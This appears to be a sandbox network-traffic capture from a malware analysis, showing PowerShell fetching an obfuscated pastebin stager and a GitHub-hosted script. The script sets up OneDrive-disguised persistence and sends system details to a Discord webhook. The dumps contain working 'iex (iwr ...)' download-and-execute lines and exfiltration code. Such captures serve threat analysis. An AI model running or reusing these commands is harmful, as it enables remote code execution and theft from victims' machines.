                                            2024-10-15 14:08:12 UTC | 1378 | IN | Data Raw: 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 34 34 2c 34 32 2c 34 31 2c 38 39 2c 38 2c 31 38 36 2c 34 36 2c 30 2c 30 2c 30 2c 32 34 36 2c 32 35 2c 30 2c 30 2c 30 2c 30 2c 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 32 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 34 36 2c 32 33 38 2c 32 38 2c 31 2c 38 37 2c 30 2c 31 30 35 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 31 35 2c 30 2c 30 2c 30 2c 32 32 2c 30 2c 39 30 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 33 36 2c 38 39 2c 31 30 34 2c 31 38 33 2c 31 36 2c 30 2c 38 33 2c 31 32 31 2c 31 31 35 2c 31 31 36 2c 31 30 31 2c 31 30 39 2c 35 31 2c 35 30 2c 30 2c 30 2c 36 36 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34
                                            Data Ascii: 0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84
                                            2024-10-15 14:08:12 UTC | 1378 | IN | Data Raw: 34 37 2c 30 2c 39 39 2c 30 2c 33 32 2c 30 2c 33 34 2c 30 2c 31 31 32 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 30 31 2c 30 2c 31 31 34 2c 30 2c 31 31 35 2c 30 2c 31 30 34 2c 30 2c 31 30 31 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 33 32 2c 30 2c 34 35 2c 30 2c 39 39 2c 30 2c 31 31 31 2c 30 2c 31 30 39 2c 30 2c 31 30 39 2c 30 2c 39 37 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 33 32 2c 30 2c 31 31 32 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 30 31 2c 30 2c 31 31 34 2c 30 2c 31 31 35 2c 30 2c 31 30 34 2c 30 2c 31 30 31 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 34 35 2c 30 2c 31 31 39 2c 30 2c 31 30 35 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 31 31 31
                                            Data Ascii: 47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111
                                            2024-10-15 14:08:12 UTC | 1378 | IN | Data Raw: 31 30 2c 32 33 39 2c 31 37 2c 31 35 30 2c 31 39 34 2c 32 31 32 2c 32 31 36 2c 38 33 2c 31 33 33 2c 32 34 2c 31 37 2c 37 33 2c 32 2c 30 2c 30 2c 39 2c 30 2c 30 2c 31 36 30 2c 38 39 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 32 33 37 2c 34 38 2c 31 38 39 2c 32 31 38 2c 36 37 2c 30 2c 31 33 37 2c 37 31 2c 31 36 37 2c 32 34 38 2c 32 30 38 2c 31 39 2c 31 36 34 2c 31 31 35 2c 31 30 32 2c 33 34 2c 36 31 2c 30 2c 30 2c 30 2c 31 30 30 2c 30 2c 30 2c 30 2c 30 2c 33 31 2c 30 2c 30 2c 30 2c 32 32 2c 30 2c 30 2c 30 2c 38 33 2c 30 2c 31 32 31 2c 30 2c 31 31 35 2c 30 2c 31 31 36 2c 30 2c 31 30 31 2c 30 2c 31 30 39 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 33 32 2c 30 2c 34 30 2c 30 2c 36 37 2c 30 2c 35 38 2c 30 2c 39 32 2c 30 2c 38 37 2c 30 2c 31 30 35 2c 30
                                            Data Ascii: 10,239,17,150,194,212,216,83,133,24,17,73,2,0,0,9,0,0,160,89,0,0,0,49,83,80,83,237,48,189,218,67,0,137,71,167,248,208,19,164,115,102,34,61,0,0,0,100,0,0,0,0,31,0,0,0,22,0,0,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,40,0,67,0,58,0,92,0,87,0,105,0
                                            2024-10-15 14:08:12 UTC | 1378 | IN | Data Raw: 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 35 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 31 37 37 2c 32 32 2c 31 30 39 2c 36 38 2c 31 37 33 2c 31 34 31 2c 31 31 32 2c 37 32 2c 31 36 37 2c 37 32 2c 36 34 2c 34 36 2c 31 36 34 2c 36 31 2c 31 32 30 2c 31 34 30 2c 32 39 2c 30 2c 30 2c 30 2c 31 30 34 2c 30 2c 30 2c 30 2c 30 2c 37 32 2c 30 2c 30 2c 30 2c 31 32 37 2c 31 30 35 2c 31 39 34 2c 32 32 34 2c 32 31 37 2c 38 38 2c 32 34 38 2c 37 35 2c 31 33 38 2c 32 35 32 2c 32 36 2c 36 30 2c 36 36 2c 34 39 2c 34 2c 37 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 29 0a 24 72 65 63 6f 6e 73 74 72 75
                                            Data Ascii: 108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,0,0,0,0,0,0,57,0,0,0,49,83,80,83,177,22,109,68,173,141,112,72,167,72,64,46,164,61,120,140,29,0,0,0,104,0,0,0,0,72,0,0,0,127,105,194,224,217,88,248,75,138,252,26,60,66,49,4,72,0,0,0,0,0,0,0,0,0,0,0,0)$reconstru
                                            2024-10-15 14:08:12 UTC | 198 | IN | Data Raw: 74 70 75 74 20 22 46 61 69 6c 65 64 20 74 6f 20 73 65 6e 64 20 6d 65 73 73 61 67 65 2e 20 45 72 72 6f 72 3a 20 24 5f 22 0a 7d 0a 23 73 74 61 72 74 20 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 69 6e 64 6f 77 73 74 79 6c 65 20 68 20 2d 61 72 67 73 20 27 69 65 78 20 28 69 77 72 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 4e 65 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 5f 70 79 6c 64 2e 74 78 74 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 27 0a 0a 7d 0a
                                            Data Ascii: tput "Failed to send message. Error: $_"}#start powershell -windowstyle h -args 'iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)'}


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            1 | 192.168.2.8 | 49710 | 104.20.4.235 | 443 | 5632 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-10-15 14:08:30 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: pastebin.com
                                            Connection: Keep-Alive
                                            2024-10-15 14:08:31 UTC | 397 | IN | HTTP/1.1 200 OK
                                            Date: Tue, 15 Oct 2024 14:08:30 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            x-frame-options: DENY
                                            x-content-type-options: nosniff
                                            x-xss-protection: 1;mode=block
                                            cache-control: public, max-age=1801
                                            CF-Cache-Status: HIT
                                            Age: 960
                                            Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                            Server: cloudflare
                                            CF-RAY: 8d3061b198b06c50-DFW
                                            2024-10-15 14:08:31 UTC | 139 | IN | Data Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                            2024-10-15 14:08:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            2 | 192.168.2.8 | 49712 | 185.199.110.133 | 443 | 5632 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-10-15 14:08:32 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            2024-10-15 14:08:32 UTC | 901 | IN | HTTP/1.1 200 OK
                                            Connection: close
                                            Content-Length: 7508
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                            Accept-Ranges: bytes
                                            Date: Tue, 15 Oct 2024 14:08:32 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-dfw-kdfw8210177-DFW
                                            X-Cache: HIT
                                            X-Cache-Hits: 0
                                            X-Timer: S1729001312.389066,VS0,VE92
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: 773c73a8812e505d2f5ce1604fa1e900be02fa6b
                                            Expires: Tue, 15 Oct 2024 14:13:32 GMT
                                            Source-Age: 0
                                            2024-10-15 14:08:32 UTC | 1378 | IN | Data Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                            2024-10-15 14:08:32 UTC | 1378 | IN | Data Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                            2024-10-15 14:08:32 UTC | 1378 | IN | Data Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                            2024-10-15 14:08:32 UTC | 1378 | IN | Data Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                            2024-10-15 14:08:32 UTC | 1378 | IN | Data Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                            2024-10-15 14:08:32 UTC | 618 | IN | Data Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            3 | 192.168.2.8 | 49713 | 162.159.136.232 | 443 | 3364 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-10-15 14:08:33 UTC | 311 | OUT | POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Content-Type: application/json
                                            Host: discord.com
                                            Content-Length: 216
                                            Connection: Keep-Alive
                                            2024-10-15 14:08:33 UTC | 216 | OUT | Data Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 68 75 62 65 72 74 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 63 72 7a 63 72 70 74 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 34 41 4d 41 47 4b 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                            Data Ascii: { "content": "**user** has joined - crzcrpt\n----------------------------------\n**GPU:** 4AMAGK\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                            2024-10-15 14:08:33 UTC | 1257 | IN | HTTP/1.1 404 Not Found
                                            Date: Tue, 15 Oct 2024 14:08:33 GMT
                                            Content-Type: application/json
                                            Content-Length: 45
                                            Connection: close
                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                            x-ratelimit-limit: 5
                                            x-ratelimit-remaining: 4
                                            x-ratelimit-reset: 1729001314
                                            x-ratelimit-reset-after: 1
                                            via: 1.1 google
                                            alt-svc: h3=":443"; ma=86400
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LOOe4xbhUtxpb4QqymtypeX0J4MY2HoX0R64P0lynOZa%2FqywR3hPeseHLJW%2FW2fOhw179RpID%2FZfcGuEkDiFH09lT7yACLJQoOL9oByhy%2BZlrBmAxow67x9Ogjhs"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            X-Content-Type-Options: nosniff
                                            Set-Cookie: __cfruid=071caa7cf962937357e114a6e27d75dfa742eb30-1729001313; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                            Set-Cookie: _cfuvid=NcUK2lEgjsnxvrHiCU4VknYATx8I.UozHHWRfgF.gfk-1729001313478-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Server: cloudflare
                                            CF-RAY: 8d3061c0ad916b5f-DFW
                                            2024-10-15 14:08:33 UTC | 45 | IN | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            4 | 192.168.2.8 | 49715 | 104.20.4.235 | 443 | 5336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-10-15 14:08:38 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: pastebin.com
                                            Connection: Keep-Alive
                                            2024-10-15 14:08:39 UTC | 397 | IN | HTTP/1.1 200 OK
                                            Date: Tue, 15 Oct 2024 14:08:38 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            x-frame-options: DENY
                                            x-content-type-options: nosniff
                                            x-xss-protection: 1;mode=block
                                            cache-control: public, max-age=1801
                                            CF-Cache-Status: HIT
                                            Age: 968
                                            Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                            Server: cloudflare
                                            CF-RAY: 8d3061e23d736b45-DFW
                                            2024-10-15 14:08:39 UTC | 139 bytes | IN | Data Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                            Data Ascii (chunked body: the leading "85" is the hex chunk length, 133 bytes, followed by CRLF; it is not part of the script):
                                            calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                            2024-10-15 14:08:39 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0 (zero-length final chunk that terminates the chunked response)


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            5 | 192.168.2.8 | 49717 | 185.199.110.133 | 443 | 5336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-10-15 14:08:40 UTC | 222 bytes | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            2024-10-15 14:08:40 UTC | 900 bytes | IN | HTTP/1.1 200 OK
                                            Connection: close
                                            Content-Length: 7508
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                            Accept-Ranges: bytes
                                            Date: Tue, 15 Oct 2024 14:08:40 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-dfw-kdal2120065-DFW
                                            X-Cache: HIT
                                            X-Cache-Hits: 1
                                            X-Timer: S1729001320.468643,VS0,VE1
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: 96d6a4d1f8b6730ceb980411df7263271bf592a9
                                            Expires: Tue, 15 Oct 2024 14:13:40 GMT
                                            Source-Age: 8
